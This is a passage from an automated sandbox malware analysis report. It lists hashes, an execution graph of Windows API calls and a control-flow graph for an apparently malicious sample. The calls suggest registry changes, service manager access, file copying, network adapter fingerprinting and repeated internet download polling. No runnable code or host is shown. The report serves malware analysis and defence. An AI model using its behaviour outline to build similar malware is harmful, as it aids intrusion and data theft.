                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastSleep
                                                    • String ID:
                                                    • API String ID: 1458359878-0
                                                    • Opcode ID: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                    • Instruction ID: de14e8d07cc4d1fec6b94f0f99926b65e7014e25a7505cf550c56fab82152177
                                                    • Opcode Fuzzy Hash: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                    • Instruction Fuzzy Hash: 91F0F672640954978A20B5DB89A1A3F724CDA94365760012BEC0CD7203C579CC494BAD

                                                    Execution Graph

                                                    Execution Coverage:1.1%
                                                    Dynamic/Decrypted Code Coverage:68.7%
                                                    Signature Coverage:25.1%
                                                    Total number of Nodes:549
                                                    Total number of Limit Nodes:31
                                                    execution_graph 60679 40d8e0 LoadLibraryExA 60680 402602 60679->60680 60681 40df22 60680->60681 60682 40de05 GetLastError 60680->60682 60684 40d22e Sleep 60680->60684 60686 2d73d0f 60680->60686 60684->60680 60687 2d73d1d 60686->60687 60688 2d73d18 60686->60688 60692 2d73d32 60687->60692 60700 2d7b8e1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 60688->60700 60691 2d73d2b 60691->60680 60693 2d73d3e __alloc_osfhnd 60692->60693 60697 2d73d8c ___DllMainCRTStartup 60693->60697 60698 2d73de9 __alloc_osfhnd 60693->60698 60701 2d73b9d 60693->60701 60695 2d73dc6 60696 2d73b9d __CRT_INIT@12 138 API calls 60695->60696 60695->60698 60696->60698 60697->60695 60697->60698 60699 2d73b9d __CRT_INIT@12 138 API calls 60697->60699 60698->60691 60699->60695 60700->60687 60702 2d73ba9 __alloc_osfhnd 60701->60702 60703 2d73bb1 60702->60703 60704 2d73c2b 60702->60704 60749 2d781e7 GetProcessHeap 60703->60749 60706 2d73c94 60704->60706 60707 2d73c2f 60704->60707 60709 2d73cf7 60706->60709 60710 2d73c99 60706->60710 60712 2d73c50 60707->60712 60718 2d73bba __alloc_osfhnd __CRT_INIT@12 60707->60718 60838 2d7845c 59 API calls _doexit 60707->60838 60708 2d73bb6 60708->60718 60750 2d75d94 60708->60750 60709->60718 60853 2d75c24 59 API calls 2 library calls 60709->60853 60843 2d791cb TlsGetValue 60710->60843 60839 2d78333 61 API calls _free 60712->60839 60715 2d73ca4 60715->60718 60844 2d78a6d 60715->60844 60718->60697 60719 2d73bc6 __RTC_Initialize 60719->60718 60726 2d73bd6 GetCommandLineA 60719->60726 60720 2d73c55 60734 2d73c66 __CRT_INIT@12 60720->60734 60840 2d7b57f 60 API calls _free 60720->60840 60725 2d73c61 60841 2d75e0a 62 API calls 2 library calls 60725->60841 60771 2d7b97d GetEnvironmentStringsW 60726->60771 60730 2d73ccd 60732 2d73cd3 60730->60732 60733 2d73ceb 60730->60733 60851 2d75ce1 59 API calls 4 library calls 60732->60851 60852 2d72f74 59 API calls 2 library calls 60733->60852 60842 2d73c7f 62 API calls __mtterm 60734->60842 60738 2d73bf0 60739 2d73bf4 60738->60739 60803 2d7b5d1 60738->60803 60836 2d75e0a 62 API calls 2 library calls 60739->60836 60740 2d73cdb GetCurrentThreadId 60740->60718 60744 2d73c14 60744->60718 60837 2d7b57f 60 API calls _free 60744->60837 60749->60708 60854 2d78503 36 API calls 2 library calls 60750->60854 60752 2d75d99 60855 2d78a1f InitializeCriticalSectionAndSpinCount __mtinitlocks 60752->60855 60754 2d75d9e 60755 2d75da2 60754->60755 60857 2d7918e TlsAlloc 60754->60857 60856 2d75e0a 62 API calls 2 library calls 60755->60856 60758 2d75da7 60758->60719 60759 2d75db4 60759->60755 60760 2d75dbf 60759->60760 60761 2d78a6d __calloc_crt 59 API calls 60760->60761 60762 2d75dcc 60761->60762 60763 2d75e01 60762->60763 60858 2d791ea TlsSetValue 60762->60858 60860 2d75e0a 62 API calls 2 library calls 60763->60860 60766 2d75de0 60766->60763 60768 2d75de6 60766->60768 60767 2d75e06 60767->60719 60859 2d75ce1 59 API calls 4 library calls 60768->60859 60770 2d75dee GetCurrentThreadId 60770->60719 60772 2d7b990 WideCharToMultiByte 60771->60772 60777 2d73be6 60771->60777 60774 2d7b9c3 60772->60774 60775 2d7b9fa FreeEnvironmentStringsW 60772->60775 60861 2d78ab5 59 API calls 2 library calls 60774->60861 60775->60777 60784 2d7b2cb 60777->60784 60778 2d7b9c9 60778->60775 60779 2d7b9d0 WideCharToMultiByte 60778->60779 60780 2d7b9e6 60779->60780 60781 2d7b9ef FreeEnvironmentStringsW 60779->60781 60862 2d72f74 59 API calls 2 library calls 60780->60862 60781->60777 60783 2d7b9ec 60783->60781 60785 2d7b2d7 __alloc_osfhnd 60784->60785 60863 2d788ee 60785->60863 60787 2d7b2de 60788 2d78a6d __calloc_crt 59 API calls 60787->60788 60790 2d7b2ef 60788->60790 60789 2d7b35a GetStartupInfoW 60793 2d7b49e 60789->60793 60797 2d7b36f 60789->60797 60790->60789 60791 2d7b2fa __alloc_osfhnd @_EH4_CallFilterFunc@8 60790->60791 60791->60738 60792 2d7b566 60872 2d7b576 RtlLeaveCriticalSection _doexit 60792->60872 60793->60792 60796 2d7b4eb GetStdHandle 60793->60796 60799 2d7b4fe GetFileType 60793->60799 60871 2d7920c InitializeCriticalSectionAndSpinCount 60793->60871 60795 2d78a6d __calloc_crt 59 API calls 60795->60797 60796->60793 60797->60793 60797->60795 60798 2d7b3bd 60797->60798 60798->60793 60800 2d7b3f1 GetFileType 60798->60800 60870 2d7920c InitializeCriticalSectionAndSpinCount 60798->60870 60799->60793 60800->60798 60804 2d7b5e4 GetModuleFileNameA 60803->60804 60805 2d7b5df 60803->60805 60807 2d7b611 60804->60807 60881 2d7528a 71 API calls __setmbcp 60805->60881 60875 2d7b684 60807->60875 60811 2d7b64a 60812 2d7b684 _parse_cmdline 59 API calls 60811->60812 60813 2d73c00 60811->60813 60812->60813 60813->60744 60814 2d7b800 60813->60814 60815 2d7b809 60814->60815 60818 2d7b80e _strlen 60814->60818 60885 2d7528a 71 API calls __setmbcp 60815->60885 60817 2d78a6d __calloc_crt 59 API calls 60826 2d7b844 _strlen 60817->60826 60818->60817 60821 2d73c09 60818->60821 60819 2d7b896 60887 2d72f74 59 API calls 2 library calls 60819->60887 60821->60744 60830 2d7846b 60821->60830 60822 2d78a6d __calloc_crt 59 API calls 60822->60826 60823 2d7b8bd 60888 2d72f74 59 API calls 2 library calls 60823->60888 60826->60819 60826->60821 60826->60822 60826->60823 60827 2d7b8d4 60826->60827 60886 2d76cbc 59 API calls ___strgtold12_l 60826->60886 60889 2d74f05 8 API calls 2 library calls 60827->60889 60829 2d7b8e0 60831 2d78477 __IsNonwritableInCurrentImage 60830->60831 60890 2d7d2df 60831->60890 60833 2d78495 __initterm_e 60835 2d784b4 __cinit __IsNonwritableInCurrentImage 60833->60835 60893 2d733a4 60833->60893 60835->60744 60836->60718 60837->60739 60838->60712 60839->60720 60840->60725 60841->60734 60842->60718 60843->60715 60845 2d78a74 60844->60845 60847 2d73cb5 60845->60847 60849 2d78a92 60845->60849 60928 2d804b8 60845->60928 60847->60718 60850 2d791ea TlsSetValue 60847->60850 60849->60845 60849->60847 60936 2d79505 Sleep 60849->60936 60850->60730 60851->60740 60852->60718 60853->60718 60854->60752 60855->60754 60856->60758 60857->60759 60858->60766 60859->60770 60860->60767 60861->60778 60862->60783 60864 2d78912 RtlEnterCriticalSection 60863->60864 60865 2d788ff 60863->60865 60864->60787 60873 2d78976 59 API calls 10 library calls 60865->60873 60867 2d78905 60867->60864 60874 2d78440 59 API calls 3 library calls 60867->60874 60870->60798 60871->60793 60872->60791 60873->60867 60877 2d7b6a6 60875->60877 60879 2d7b70a 60877->60879 60883 2d815d6 59 API calls x_ismbbtype_l 60877->60883 60878 2d7b627 60878->60813 60882 2d78ab5 59 API calls 2 library calls 60878->60882 60879->60878 60884 2d815d6 59 API calls x_ismbbtype_l 60879->60884 60881->60804 60882->60811 60883->60877 60884->60879 60885->60818 60886->60826 60887->60821 60888->60821 60889->60829 60891 2d7d2e2 RtlEncodePointer 60890->60891 60891->60891 60892 2d7d2fc 60891->60892 60892->60833 60896 2d732a8 60893->60896 60895 2d733af 60895->60835 60897 2d732b4 __alloc_osfhnd 60896->60897 60904 2d78593 60897->60904 60903 2d732db __alloc_osfhnd 60903->60895 60905 2d788ee __lock 59 API calls 60904->60905 60906 2d732bd 60905->60906 60907 2d732ec RtlDecodePointer RtlDecodePointer 60906->60907 60908 2d732c9 60907->60908 60909 2d73319 60907->60909 60918 2d732e6 60908->60918 60909->60908 60921 2d7915d 60 API calls ___strgtold12_l 60909->60921 60911 2d7337c RtlEncodePointer RtlEncodePointer 60911->60908 60912 2d7332b 60912->60911 60915 2d73350 60912->60915 60922 2d78afc 62 API calls 2 library calls 60912->60922 60915->60908 60916 2d7336a RtlEncodePointer 60915->60916 60923 2d78afc 62 API calls 2 library calls 60915->60923 60916->60911 60917 2d73364 60917->60908 60917->60916 60924 2d7859c 60918->60924 60921->60912 60922->60915 60923->60917 60927 2d78a58 RtlLeaveCriticalSection 60924->60927 60926 2d732eb 60926->60903 60927->60926 60929 2d804c3 60928->60929 60932 2d804de 60928->60932 60930 2d804cf 60929->60930 60929->60932 60937 2d75e5b 59 API calls __getptd_noexit 60930->60937 60931 2d804ee RtlAllocateHeap 60931->60932 60934 2d804d4 60931->60934 60932->60931 60932->60934 60938 2d78204 RtlDecodePointer 60932->60938 60934->60845 60936->60849 60937->60934 60938->60932 60939 40dc42 60940 40dcaf 60939->60940 60941 40dc46 60939->60941 60941->60940 60942 40dc5d RegOpenKeyExA 60941->60942 60943 40dc70 60942->60943 60944 40dbc2 lstrcmpiW 60945 40d402 VirtualAlloc 60946 40d6a1 60945->60946 60947 2dc10ff 60948 2df307c DeleteFileA 60947->60948 60949 2df8072 60948->60949 60950 402247 CopyFileA 60951 402840 60950->60951 60952 402947 60953 40295b RegCloseKey 60952->60953 60955 40d6d7 60953->60955 60955->60955 60956 402cce 60959 402cd1 60956->60959 60957 40dca1 60958 40d168 RegCloseKey 60958->60959 60959->60957 60959->60958 60960 403310 GetVersion 60984 404454 HeapCreate 60960->60984 60962 40336f 60963 403374 60962->60963 60964 40337c 60962->60964 61059 40342b 8 API calls 60963->61059 60996 404134 60964->60996 60968 403384 GetCommandLineA 61010 404002 60968->61010 60972 40339e 61042 403cfc 60972->61042 60974 4033a3 60975 4033a8 GetStartupInfoA 60974->60975 61055 403ca4 60975->61055 60977 4033ba GetModuleHandleA 60979 4033de 60977->60979 61060 403a4b GetCurrentProcess TerminateProcess ExitProcess 60979->61060 60981 4033e7 61061 403b20 UnhandledExceptionFilter 60981->61061 60983 4033f8 60985 404474 60984->60985 60986 4044aa 60984->60986 61062 40430c 19 API calls 60985->61062 60986->60962 60988 404479 60989 404490 60988->60989 60990 404483 60988->60990 60992 4044ad 60989->60992 61064 40507c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 60989->61064 61063 40482b HeapAlloc 60990->61063 60992->60962 60993 40448d 60993->60992 60995 40449e HeapDestroy 60993->60995 60995->60986 61065 40344f 60996->61065 60999 404153 GetStartupInfoA 61002 404264 60999->61002 61003 40419f 60999->61003 61004 4042cb SetHandleCount 61002->61004 61005 40428b GetStdHandle 61002->61005 61003->61002 61006 40344f 12 API calls 61003->61006 61009 404210 61003->61009 61004->60968 61005->61002 61007 404299 GetFileType 61005->61007 61006->61003 61007->61002 61008 404232 GetFileType 61008->61009 61009->61002 61009->61008 61011 404050 61010->61011 61012 40401d GetEnvironmentStringsW 61010->61012 61014 404025 61011->61014 61015 404041 61011->61015 61013 404031 GetEnvironmentStrings 61012->61013 61012->61014 61013->61015 61016 403394 61013->61016 61017 404069 WideCharToMultiByte 61014->61017 61018 40405d GetEnvironmentStringsW 61014->61018 61015->61016 61019 4040e3 GetEnvironmentStrings 61015->61019 61020 4040ef 61015->61020 61033 403db5 61016->61033 61022 40409d 61017->61022 61023 4040cf FreeEnvironmentStringsW 61017->61023 61018->61016 61018->61017 61019->61016 61019->61020 61024 40344f 12 API calls 61020->61024 61025 40344f 12 API calls 61022->61025 61023->61016 61031 40410a 61024->61031 61026 4040a3 61025->61026 61026->61023 61027 4040ac WideCharToMultiByte 61026->61027 61029 4040c6 61027->61029 61030 4040bd 61027->61030 61028 404120 FreeEnvironmentStringsA 61028->61016 61029->61023 61074 403501 61030->61074 61031->61028 61034 403dc7 61033->61034 61035 403dcc GetModuleFileNameA 61033->61035 61087 406614 19 API calls 61034->61087 61037 403def 61035->61037 61038 40344f 12 API calls 61037->61038 61039 403e10 61038->61039 61040 403e20 61039->61040 61088 403406 7 API calls 61039->61088 61040->60972 61043 403d09 61042->61043 61045 403d0e 61042->61045 61089 406614 19 API calls 61043->61089 61046 40344f 12 API calls 61045->61046 61047 403d3b 61046->61047 61054 403d4f 61047->61054 61090 403406 7 API calls 61047->61090 61049 403d92 61050 403501 7 API calls 61049->61050 61051 403d9e 61050->61051 61051->60974 61052 40344f 12 API calls 61052->61054 61054->61049 61054->61052 61091 403406 7 API calls 61054->61091 61056 403cad 61055->61056 61058 403cb2 61055->61058 61092 406614 19 API calls 61056->61092 61058->60977 61060->60981 61061->60983 61062->60988 61063->60993 61064->60993 61069 403461 61065->61069 61068 403406 7 API calls 61068->60999 61070 40345e 61069->61070 61072 403468 61069->61072 61070->60999 61070->61068 61072->61070 61073 40348d 12 API calls 61072->61073 61073->61072 61075 403529 61074->61075 61076 40350d 61074->61076 61075->61029 61077 403517 61076->61077 61078 40352d 61076->61078 61080 403559 HeapFree 61077->61080 61081 403523 61077->61081 61079 403558 61078->61079 61083 403547 61078->61083 61079->61080 61080->61075 61085 40489e VirtualFree VirtualFree HeapFree 61081->61085 61086 40532f VirtualFree HeapFree VirtualFree 61083->61086 61085->61075 61086->61075 61087->61035 61088->61040 61089->61045 61090->61054 61091->61054 61092->61058 61093 2d6f9a6 LoadLibraryA 61094 2d6f9cf GetProcAddress 61093->61094 61095 2d6fa89 61093->61095 61096 2d6fa82 FreeLibrary 61094->61096 61098 2d6f9e3 61094->61098 61096->61095 61097 2d6f9f5 GetAdaptersInfo 61097->61098 61098->61097 61099 2d6fa7d 61098->61099 61101 2d73b4c 60 API calls 4 library calls 61098->61101 61099->61096 61101->61098 61102 40d0f2 CopyFileA 61103 40d0f8 OpenSCManagerA 61102->61103 61105 40d927 61103->61105 61106 402332 61107 40d298 GetLocalTime 61106->61107 61108 40d998 61107->61108 61110 401f27 61108->61110 61111 401f3c 61110->61111 61114 401a1d 61111->61114 61113 401f45 61113->61108 61115 401a2c 61114->61115 61120 401a4f CreateFileA 61115->61120 61119 401a3e 61119->61113 61121 401a35 61120->61121 61123 401a7d 61120->61123 61128 401b4b LoadLibraryA 61121->61128 61122 401a98 DeviceIoControl 61122->61123 61123->61122 61125 401b3a CloseHandle 61123->61125 61126 401b0e GetLastError 61123->61126 61137 403106 7 API calls 61123->61137 61138 4030f8 12 API calls 61123->61138 61125->61121 61126->61123 61126->61125 61129 401c21 61128->61129 61130 401b6e GetProcAddress 61128->61130 61129->61119 61131 401b85 61130->61131 61132 401c18 FreeLibrary 61130->61132 61133 401b95 GetAdaptersInfo 61131->61133 61135 401c15 61131->61135 61139 403106 7 API calls 61131->61139 61140 4030f8 12 API calls 61131->61140 61132->61129 61133->61131 61135->61132 61137->61123 61138->61123 61139->61131 61140->61131 61141 402556 RegCreateKeyExA 61142 40db60 61141->61142 61143 402a64 SetEvent 61141->61143 61142->61143 61144 40db66 61142->61144 61145 402b11 61143->61145 61145->61145 61146 40d3b7 61147 40d3b8 61146->61147 61148 40db05 61147->61148 61150 401f64 FindResourceA 61147->61150 61151 401f86 GetLastError SizeofResource 61150->61151 61153 401f9f 61150->61153 61152 401fa6 LoadResource LockResource GlobalAlloc 61151->61152 61151->61153 61154 401fd2 61152->61154 61153->61148 61155 401ffb GetTickCount 61154->61155 61157 402005 GlobalAlloc 61155->61157 61157->61153 61158 4026b8 61159 40db3d CreateDirectoryA 61158->61159 61160 40dacc 61159->61160 61160->61159 61161 40233a 61162 40d755 Sleep 61161->61162 61163 2d6104d 61164 2d733a4 __cinit 68 API calls 61163->61164 61165 2d61057 61164->61165 61168 2d61aa9 InterlockedIncrement 61165->61168 61169 2d61ac5 WSAStartup InterlockedExchange 61168->61169 61170 2d6105c 61168->61170 61169->61170 61171 2d6648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61210 2d642c7 61171->61210 61173 2d664f3 GetTickCount 61174 2d6605a 59 API calls 61173->61174 61175 2d66508 GetVersionExA 61174->61175 61176 2d66549 setSBCS 61175->61176 61177 2d72fac _malloc 59 API calls 61176->61177 61178 2d66556 61177->61178 61179 2d72fac _malloc 59 API calls 61178->61179 61180 2d66566 61179->61180 61181 2d72fac _malloc 59 API calls 61180->61181 61182 2d66571 61181->61182 61183 2d72fac _malloc 59 API calls 61182->61183 61184 2d6657c 61183->61184 61185 2d72fac _malloc 59 API calls 61184->61185 61186 2d66587 61185->61186 61187 2d72fac _malloc 59 API calls 61186->61187 61188 2d66592 61187->61188 61189 2d72fac _malloc 59 API calls 61188->61189 61190 2d6659d 61189->61190 61191 2d72fac _malloc 59 API calls 61190->61191 61192 2d665ac 6 API calls 61191->61192 61193 2d665ff setSBCS 61192->61193 61194 2d66618 RtlEnterCriticalSection RtlLeaveCriticalSection 61193->61194 61195 2d72fac _malloc 59 API calls 61194->61195 61196 2d66657 61195->61196 61197 2d72fac _malloc 59 API calls 61196->61197 61198 2d66665 61197->61198 61199 2d72fac _malloc 59 API calls 61198->61199 61200 2d6666c 61199->61200 61201 2d72fac _malloc 59 API calls 61200->61201 61202 2d66692 QueryPerformanceCounter Sleep 61201->61202 61203 2d72fac _malloc 59 API calls 61202->61203 61204 2d666bf 61203->61204 61205 2d72fac _malloc 59 API calls 61204->61205 61206 2d666cc setSBCS 61205->61206 61207 2d66708 Sleep 61206->61207 61208 2d6670e RtlEnterCriticalSection RtlLeaveCriticalSection 61206->61208 61207->61208 61209 2d66744 setSBCS 61208->61209 61211 2d642cd 61210->61211 61212 2d9e084 61213 2d9e0a9 61212->61213 61216 2d6f8a2 CreateFileA 61213->61216 61217 2d6f99e 61216->61217 61219 2d6f8d3 61216->61219 61218 2d6f8eb DeviceIoControl 61218->61219 61219->61218 61220 2d6f994 CloseHandle 61219->61220 61221 2d6f960 GetLastError 61219->61221 61223 2d73b4c 60 API calls 4 library calls 61219->61223 61220->61217 61221->61219 61221->61220 61223->61219 61224 2d672ab InternetOpenA 61225 2d672c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 61224->61225 61234 2d67389 setSBCS 61224->61234 61328 2d74af0 61225->61328 61228 2d67382 InternetCloseHandle 61228->61234 61229 2d67342 InternetReadFile 61235 2d67377 InternetCloseHandle 61229->61235 61231 2d66708 Sleep 61233 2d6670e RtlEnterCriticalSection RtlLeaveCriticalSection 61231->61233 61232 2d666f4 61232->61231 61232->61233 61242 2d66744 setSBCS 61233->61242 61234->61232 61236 2d673e9 RtlEnterCriticalSection RtlLeaveCriticalSection 61234->61236 61235->61228 61330 2d7233c 61236->61330 61238 2d67413 61239 2d67463 61238->61239 61241 2d7233c 66 API calls 61238->61241 61239->61232 61240 2d7233c 66 API calls 61239->61240 61243 2d67484 61240->61243 61244 2d67427 61241->61244 61298 2d67738 61243->61298 61343 2d72fac 61243->61343 61244->61239 61246 2d7233c 66 API calls 61244->61246 61245 2d7233c 66 API calls 61247 2d67750 61245->61247 61249 2d6743b 61246->61249 61250 2d6779d 61247->61250 61252 2d6775a setSBCS 61247->61252 61249->61239 61254 2d7233c 66 API calls 61249->61254 61253 2d7233c 66 API calls 61250->61253 61257 2d6776a RtlEnterCriticalSection RtlLeaveCriticalSection 61252->61257 61255 2d677ab 61253->61255 61256 2d6744f 61254->61256 61258 2d677d0 61255->61258 61259 2d677b1 61255->61259 61256->61239 61262 2d7233c 66 API calls 61256->61262 61257->61232 61260 2d7233c 66 API calls 61258->61260 61340 2d661f5 61259->61340 61263 2d677de 61260->61263 61262->61239 61264 2d67b00 61263->61264 61268 2d677f0 61263->61268 61265 2d7233c 66 API calls 61264->61265 61266 2d67b0e 61265->61266 61266->61232 61267 2d72fac _malloc 59 API calls 61266->61267 61272 2d67b22 setSBCS 61267->61272 61268->61232 61371 2d72418 79 API calls 2 library calls 61268->61371 61270 2d67827 61372 2d61ba7 RtlEnterCriticalSection RtlLeaveCriticalSection RtlEnterCriticalSection RtlLeaveCriticalSection __EH_prolog 61270->61372 61278 2d67b4f 61272->61278 61383 2d6534d 93 API calls 2 library calls 61272->61383 61273 2d678aa 61274 2d678e2 RtlEnterCriticalSection 61273->61274 61275 2d67905 61274->61275 61276 2d6790f RtlLeaveCriticalSection 61274->61276 61275->61276 61373 2d63c67 72 API calls Mailbox 61276->61373 61277 2d674d5 setSBCS 61280 2d7233c 66 API calls 61277->61280 61289 2d6755c 61277->61289 61384 2d72f74 59 API calls 2 library calls 61278->61384 61280->61289 61282 2d72fac _malloc 59 API calls 61287 2d67593 setSBCS 61282->61287 61284 2d67938 61374 2d63d7e 64 API calls 61284->61374 61286 2d6794a 61375 2d6833a 89 API calls 61286->61375 61291 2d675f8 61287->61291 61360 2d735e6 60 API calls 3 library calls 61287->61360 61289->61282 61290 2d6796c 61292 2d67ae7 61290->61292 61376 2d6a724 73 API calls Mailbox 61290->61376 61363 2d72f74 59 API calls 2 library calls 61291->61363 61382 2d69002 88 API calls __EH_prolog 61292->61382 61297 2d675fe 61297->61298 61364 2d73b4c 60 API calls 4 library calls 61297->61364 61298->61245 61299 2d67aaf 61380 2d683e9 71 API calls Mailbox 61299->61380 61302 2d679b8 61302->61299 61377 2d6a724 73 API calls Mailbox 61302->61377 61303 2d6760e 61307 2d67629 61303->61307 61365 2d69736 6 API calls __EH_prolog 61303->61365 61305 2d67ac7 61381 2d633b2 86 API calls 61305->61381 61366 2d6a84e 60 API calls 2 library calls 61307->61366 61308 2d675c4 61308->61291 61361 2d72850 59 API calls _vscan_fn 61308->61361 61362 2d735e6 60 API calls 3 library calls 61308->61362 61313 2d6763f 61367 2d65119 103 API calls 3 library calls 61313->61367 61314 2d67a1a 61314->61299 61378 2d6a724 73 API calls Mailbox 61314->61378 61316 2d67a6b 61316->61299 61379 2d6d116 73 API calls Mailbox 61316->61379 61319 2d67687 61368 2d6ac0e 88 API calls 3 library calls 61319->61368 61321 2d676d4 61322 2d676e7 shared_ptr 61321->61322 61323 2d676ec Sleep 61321->61323 61322->61323 61369 2d718f0 GetProcessHeap HeapFree 61323->61369 61325 2d67708 61326 2d67722 shared_ptr 61325->61326 61370 2d64100 GetProcessHeap HeapFree 61325->61370 61326->61298 61329 2d67322 InternetOpenUrlA 61328->61329 61329->61228 61329->61229 61331 2d72348 61330->61331 61335 2d7236b 61330->61335 61332 2d7234e 61331->61332 61331->61335 61385 2d75e5b 59 API calls __getptd_noexit 61332->61385 61387 2d72383 66 API calls 4 library calls 61335->61387 61336 2d7237e 61336->61238 61337 2d72353 61386 2d74ef5 9 API calls ___strgtold12_l 61337->61386 61339 2d7235e 61339->61238 61341 2d72fac _malloc 59 API calls 61340->61341 61342 2d66208 61341->61342 61344 2d73027 61343->61344 61349 2d72fb8 61343->61349 61394 2d78204 RtlDecodePointer 61344->61394 61346 2d72fc3 61346->61349 61388 2d786d4 59 API calls 2 library calls 61346->61388 61389 2d78731 59 API calls 8 library calls 61346->61389 61390 2d7831d GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61346->61390 61347 2d7302d 61395 2d75e5b 59 API calls __getptd_noexit 61347->61395 61349->61346 61352 2d72feb RtlAllocateHeap 61349->61352 61354 2d73013 61349->61354 61358 2d73011 61349->61358 61391 2d78204 RtlDecodePointer 61349->61391 61351 2d6749d RtlEnterCriticalSection RtlLeaveCriticalSection 61351->61277 61352->61349 61352->61351 61392 2d75e5b 59 API calls __getptd_noexit 61354->61392 61393 2d75e5b 59 API calls __getptd_noexit 61358->61393 61360->61308 61361->61308 61362->61308 61363->61297 61364->61303 61365->61307 61366->61313 61367->61319 61368->61321 61369->61325 61370->61326 61371->61270 61372->61273 61373->61284 61374->61286 61375->61290 61376->61302 61377->61314 61378->61316 61379->61299 61380->61305 61381->61292 61382->61232 61383->61278 61384->61232 61385->61337 61386->61339 61387->61336 61388->61346 61389->61346 61391->61349 61392->61358 61393->61351 61394->61347 61395->61351 61396 2d9e224 CreateFileA 61397 2dbaf16 61396->61397

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 2d672ab-2d672c3 InternetOpenA 1 2d67389-2d6738f 0->1 2 2d672c9-2d67340 InternetSetOptionA * 3 call 2d74af0 InternetOpenUrlA 0->2 3 2d67391-2d67397 1->3 4 2d673ab-2d673b9 1->4 11 2d67382-2d67383 InternetCloseHandle 2->11 12 2d67342 2->12 6 2d6739d-2d673aa call 2d653ec 3->6 7 2d67399-2d6739b 3->7 8 2d666f4-2d666f6 4->8 9 2d673bf-2d673e3 call 2d74af0 call 2d6439c 4->9 6->4 7->4 14 2d666ff-2d66701 8->14 15 2d666f8-2d666fd 8->15 9->8 33 2d673e9-2d67417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d7233c 9->33 11->1 17 2d67346-2d6736c InternetReadFile 12->17 20 2d66703 14->20 21 2d6670e-2d66742 RtlEnterCriticalSection RtlLeaveCriticalSection 14->21 19 2d66708 Sleep 15->19 23 2d67377-2d6737e InternetCloseHandle 17->23 24 2d6736e-2d67375 17->24 19->21 20->19 25 2d66744-2d66750 21->25 26 2d66792 21->26 23->11 24->17 25->26 28 2d66752-2d6675f 25->28 30 2d66796 26->30 31 2d66767-2d66768 28->31 32 2d66761-2d66765 28->32 34 2d6676c-2d66790 call 2d74af0 * 2 31->34 32->34 38 2d6746d-2d67488 call 2d7233c 33->38 39 2d67419-2d6742b call 2d7233c 33->39 34->30 47 2d67742-2d67754 call 2d7233c 38->47 48 2d6748e-2d67490 38->48 39->38 49 2d6742d-2d6743f call 2d7233c 39->49 56 2d67756-2d67758 47->56 57 2d6779d-2d677af call 2d7233c 47->57 48->47 51 2d67496-2d67548 call 2d72fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2d74af0 * 5 call 2d6439c * 2 48->51 49->38 59 2d67441-2d67453 call 2d7233c 49->59 114 2d67585 51->114 115 2d6754a-2d6754c 51->115 56->57 60 2d6775a-2d67798 call 2d74af0 RtlEnterCriticalSection RtlLeaveCriticalSection 56->60 70 2d677d0-2d677e2 call 2d7233c 57->70 71 2d677b1-2d677bf call 2d661f5 call 2d66303 57->71 59->38 72 2d67455-2d67467 call 2d7233c 59->72 60->8 82 2d67b00-2d67b12 call 2d7233c 70->82 83 2d677e8-2d677ea 70->83 85 2d677c4-2d677cb call 2d6640e 71->85 72->8 72->38 82->8 94 2d67b18-2d67b46 call 2d72fac call 2d74af0 call 2d6439c 82->94 83->82 87 2d677f0-2d67807 call 2d6439c 83->87 85->8 87->8 99 2d6780d-2d678db call 2d72418 call 2d61ba7 87->99 121 2d67b4f-2d67b56 call 2d72f74 94->121 122 2d67b48-2d67b4a call 2d6534d 94->122 112 2d678e2-2d67903 RtlEnterCriticalSection 99->112 113 2d678dd call 2d6143f 99->113 118 2d67905-2d6790c 112->118 119 2d6790f-2d67973 RtlLeaveCriticalSection call 2d63c67 call 2d63d7e call 2d6833a 112->119 113->112 123 2d67589-2d675b7 call 2d72fac call 2d74af0 call 2d6439c 114->123 115->114 120 2d6754e-2d67560 call 2d7233c 115->120 118->119 146 2d67ae7-2d67afb call 2d69002 119->146 147 2d67979-2d679c1 call 2d6a724 119->147 120->114 135 2d67562-2d67583 call 2d6439c 120->135 121->8 122->121 144 2d675f8-2d67601 call 2d72f74 123->144 145 2d675b9-2d675c8 call 2d735e6 123->145 135->123 156 2d67607-2d6761f call 2d73b4c 144->156 157 2d67738-2d6773b 144->157 145->144 158 2d675ca 145->158 146->8 159 2d679c7-2d679ce 147->159 160 2d67ab1-2d67ae2 call 2d683e9 call 2d633b2 147->160 170 2d67621-2d67629 call 2d69736 156->170 171 2d6762b 156->171 157->47 162 2d675cf-2d675e1 call 2d72850 158->162 164 2d679d1-2d679d6 159->164 160->146 177 2d675e6-2d675f6 call 2d735e6 162->177 178 2d675e3 162->178 164->164 165 2d679d8-2d67a23 call 2d6a724 164->165 165->160 179 2d67a29-2d67a2f 165->179 176 2d6762d-2d676e5 call 2d6a84e call 2d63863 call 2d65119 call 2d63863 call 2d6aaf4 call 2d6ac0e 170->176 171->176 202 2d676e7 call 2d6380b 176->202 203 2d676ec-2d67717 Sleep call 2d718f0 176->203 177->144 177->162 178->177 183 2d67a32-2d67a37 179->183 183->183 186 2d67a39-2d67a74 call 2d6a724 183->186 186->160 192 2d67a76-2d67ab0 call 2d6d116 186->192 192->160 202->203 207 2d67723-2d67731 203->207 208 2d67719-2d67722 call 2d64100 203->208 207->157 210 2d67733 call 2d6380b 207->210 208->207 210->157
                                                    APIs
                                                    • Sleep.KERNEL32(0000EA60), ref: 02D66708
                                                    • RtlEnterCriticalSection.NTDLL(02D971E0), ref: 02D66713
                                                    • RtlLeaveCriticalSection.NTDLL(02D971E0), ref: 02D66724
